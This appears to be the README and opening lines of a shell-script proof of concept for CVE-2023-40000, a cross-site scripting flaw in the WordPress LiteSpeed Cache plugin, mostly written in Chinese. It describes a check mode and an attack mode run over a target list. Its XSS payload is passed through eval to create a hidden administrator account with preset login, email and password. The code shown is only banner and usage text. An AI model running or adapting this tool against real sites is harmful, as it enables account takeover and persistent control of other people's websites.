这是 cve-2023-40000 的概念验证代码。Wordpress LiteSpeed Cache 漏洞利用。
该CVE可应用于所有 LiteSpeed Cache < 5.7.0.1 版本。
有两种模式:check 和 attack。
易受攻击的IP会grep版本。如果没有版本信息(目标受WAF保护)。
XSS代码被加密用于eval函数,并预定义了登录名/密码/邮箱。
# user_login=theattacker
# [email protected]
# pass1=attackpass&pass2=attackpass
# role=administrator
echo "----------------Welcome-to-cve-2023-40000-script-by-1veresk------------+";
echo "+----------------------------------------------------------------------+";
echo "+-------------------For-The-Help---------------------------------------+";
echo "Example#1: ./cve-2023-40000.sh -h--------------------------------------+";
echo "+-------------------For-The--Check-------------------------------------+";
echo "Example#2: ./cve-2023-40000.sh <TARGET_FILE> <MODE>--------------------+";
echo "+----------------------------------------------------------------------+";